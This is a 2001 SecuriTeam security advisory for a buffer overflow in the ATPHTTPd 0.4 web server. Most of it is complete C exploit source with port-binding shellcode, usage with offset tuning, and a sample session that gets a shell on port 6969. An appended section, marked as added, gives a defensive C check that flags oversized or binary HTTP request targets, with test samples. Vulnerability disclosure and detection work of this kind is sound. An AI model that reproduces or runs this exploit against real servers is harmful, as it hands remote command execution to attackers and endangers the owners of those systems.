[EXPL] ATPHTTPd Buffer Overflow Exploit Code
From: support@securiteam.com To: list@securiteam.com Date: Fri, 21 Dec 2001 13:40:06 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SUMMARY
<http://www.redshift.com/~yramin/atp/atphttpd/> ATPHTTPd, the tiny,
caching, high-performance web server, suffers from a buffer overflow
that allows remote command execution. The following exploit code can be
used to test for this vulnerability.
DETAILS
Vulnerable systems:
ATPHTTPd version 0.4
Exploit:
/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */
/* Another 31336++ codez from AngryPacket */
/*
* "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
* was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
* source for the hell of it. Ran ye old perl Ax4000|nc and did some
* gdb'n and noticed that it said the return address was 0x41414141.
* Well that speaks for itself...
*
* - dmuz@angrypacket.com
*/
/*
* developed and tested against OpenBSD. exploit creates a port-binding
* shell on the remote machine on port 6969 with the uid of the server.
* try offsets between 5000 and -5000 with increments of 100. -200 worked
* like a charm for me.
*
* ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
* [methodic@vulnhost] [~]$ nc localhost 6969
* whoami
* methodic
* id
* uid=1009(methodic) gid=1009(methodic)
* ^C punt!
*
* mad thankz to vegac who helped me with a lame bug i was over looking
*/
/* this exploit code by methodic with a little from dmuz */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>     /* bzero() */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <netdb.h>
/* usage() is defined after main(), so it needs a prototype */
int usage(char *progname);
/* 701 A's to own the EIP */
#define LEN 900
#define NOP 0x90
/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};
/* return the current stack pointer; i386-only, the value is left in %eax
   by the inline asm, which is why there is no explicit return statement */
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
int sockfd=0, port=0, offset=0;
int ch, i;
long retaddr;
char *host=NULL, http_request[LEN+20];
char *payload, *ptr=(char *)&shellcode;
struct sockaddr_in s;
while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
switch (ch) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'o':
offset = atol(optarg);
break;
}
}
> atphttpd 0.4b exploit">
printf(">> atphttpd 0.4b exploit, written by angrypacket security crew\n");
if(!host) {
usage(argv[0]);
}
if(!port) {
port = 80;
}
/* setup socket structure */
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(host);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror(" + socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
perror(" + connect");
exit(1);
}
/* build c0dez.. */
payload = (char *)malloc(LEN);
retaddr = get_sp() - offset;
printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr,
offset);
/* fill the buffer with return addr's */
for(i = 0; i < LEN; i += 4)
*(long *)&payload[i] = retaddr;
/* fill in some NOPs */
for(i = 0; i < ((LEN/2) - 100); i++)
*(payload + i) = NOP;
/* copy the shellcode and terminate the payload string */
/* the shellcode array is not NUL-terminated, so copy its exact size
   rather than relying on strlen() */
memcpy(payload + i, ptr, sizeof(shellcode));
payload[LEN-1] = '\0';
bzero(&http_request, LEN+20);
strcpy(http_request, "GET ");
strcat(http_request, payload);
strcat(http_request, " HTTP/1.0\r\n\r\n");
free(payload);
printf(" + sending payload to <%s> on port [%d].. ", host, port);
send(sockfd, http_request, strlen(http_request), 0);
printf("done\n");
close(sockfd);
printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
printf(">> visit http://sec.angrypacket.com for more security tools\n");
return(0);
}
int usage(char *progname) {
fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o
<offset>\n", progname);
exit(0);
}
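The request the code above sends is a single GET whose target is roughly 900 bytes of repeated return addresses, NOP padding and raw shellcode bytes; the advisory notes that about 700 bytes are enough to overwrite the saved return address. Each of those properties is visible on the wire, which is what a reverse proxy or IDS preprocessor in front of a small web server can key on. The following request-line check is an added example written for this page; it is not part of the SecuriTeam advisory, the exploit, or the ATPHTTPd project. The function names (`check_request_line`, the `check_sample_*` helpers), the REQ_* flags and the thresholds MAX_TARGET_LEN and MAX_RUN_LEN are assumptions chosen for illustration, and the sample requests are constructed, not captured traffic.

```c
/* Added example (not from the advisory or the ATPHTTPd project): flag
 * HTTP request lines whose target is oversized, contains bytes outside
 * printable ASCII, or contains long runs of one repeated byte (NOP sleds,
 * 'A' padding). Thresholds below are assumptions for illustration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_TARGET_LEN 512   /* assumed limit; the advisory's probe is ~900 bytes */
#define MAX_RUN_LEN    32    /* assumed; longer runs of one byte are suspicious */

enum {
    REQ_OK              = 0,
    REQ_MALFORMED       = 1 << 0,  /* not "METHOD SP target SP HTTP/x.y" */
    REQ_TARGET_TOO_LONG = 1 << 1,  /* request target longer than MAX_TARGET_LEN */
    REQ_NONPRINTABLE    = 1 << 2,  /* target byte outside 0x21..0x7e */
    REQ_REPEATED_RUN    = 1 << 3   /* run of one byte longer than MAX_RUN_LEN */
};

/* Inspect the first line of a request (up to the first CR/LF or len bytes).
 * Returns a bitmask of REQ_* flags; REQ_OK means nothing noteworthy. */
int check_request_line(const unsigned char *buf, size_t len)
{
    size_t line_len = 0;
    while (line_len < len && buf[line_len] != '\r' && buf[line_len] != '\n')
        line_len++;

    /* the request target sits between the first and second space */
    const unsigned char *sp1 = memchr(buf, ' ', line_len);
    if (!sp1) return REQ_MALFORMED;
    const unsigned char *target = sp1 + 1;
    size_t rest = line_len - (size_t)(target - buf);
    const unsigned char *sp2 = memchr(target, ' ', rest);
    if (!sp2) return REQ_MALFORMED;
    size_t target_len = (size_t)(sp2 - target);

    /* what follows the target must be an HTTP version token */
    if (line_len - (size_t)(sp2 + 1 - buf) < 5 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return REQ_MALFORMED;

    int flags = REQ_OK;
    if (target_len > MAX_TARGET_LEN) flags |= REQ_TARGET_TOO_LONG;

    size_t run = 1;
    for (size_t i = 0; i < target_len; i++) {
        if (target[i] < 0x21 || target[i] > 0x7e) flags |= REQ_NONPRINTABLE;
        if (i > 0 && target[i] == target[i - 1]) {
            if (++run > MAX_RUN_LEN) flags |= REQ_REPEATED_RUN;
        } else {
            run = 1;
        }
    }
    return flags;
}

/* Constructed sample: an ordinary request, expected to pass clean. */
int check_sample_benign(void)
{
    const char *req = "GET /index.html HTTP/1.0\r\nHost: example\r\n\r\n";
    return check_request_line((const unsigned char *)req, strlen(req));
}

/* Constructed sample: an 800-byte run of 'A' as the target, the shape of
 * the probe the advisory describes. Expect TOO_LONG and REPEATED_RUN. */
int check_sample_padded(void)
{
    static unsigned char req[4 + 800 + 13];
    memcpy(req, "GET ", 4);
    memset(req + 4, 'A', 800);
    memcpy(req + 804, " HTTP/1.0\r\n\r\n", 13);
    return check_request_line(req, sizeof req);
}

/* Constructed sample: a short target carrying raw non-ASCII bytes.
 * Length is fine, so only NONPRINTABLE should fire. */
int check_sample_binary(void)
{
    unsigned char req[] = "GET /\x90\x90\x90\x90/x HTTP/1.0\r\n";
    return check_request_line(req, sizeof req - 1);
}

int main(void)
{
    printf("benign : flags=%d\n", check_sample_benign());   /* 0 */
    printf("padded : flags=%d\n", check_sample_padded());   /* 10 */
    printf("binary : flags=%d\n", check_sample_binary());   /* 4 */
    return 0;
}
```

The check deliberately inspects only the request line, since that is all the code above needs to send; a length cap alone catches the advisory's probe, and the run and printable-byte checks catch shorter payloads that still carry a sled or raw machine code. Any flagged request is a candidate for rejection with a 414 or 400 at the proxy before it reaches a server that copies the target into a fixed-size stack buffer.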
ADDITIONAL INFORMATION
The information has been provided by Methodic
<methodic@slartibartfast.angrypacket.com>.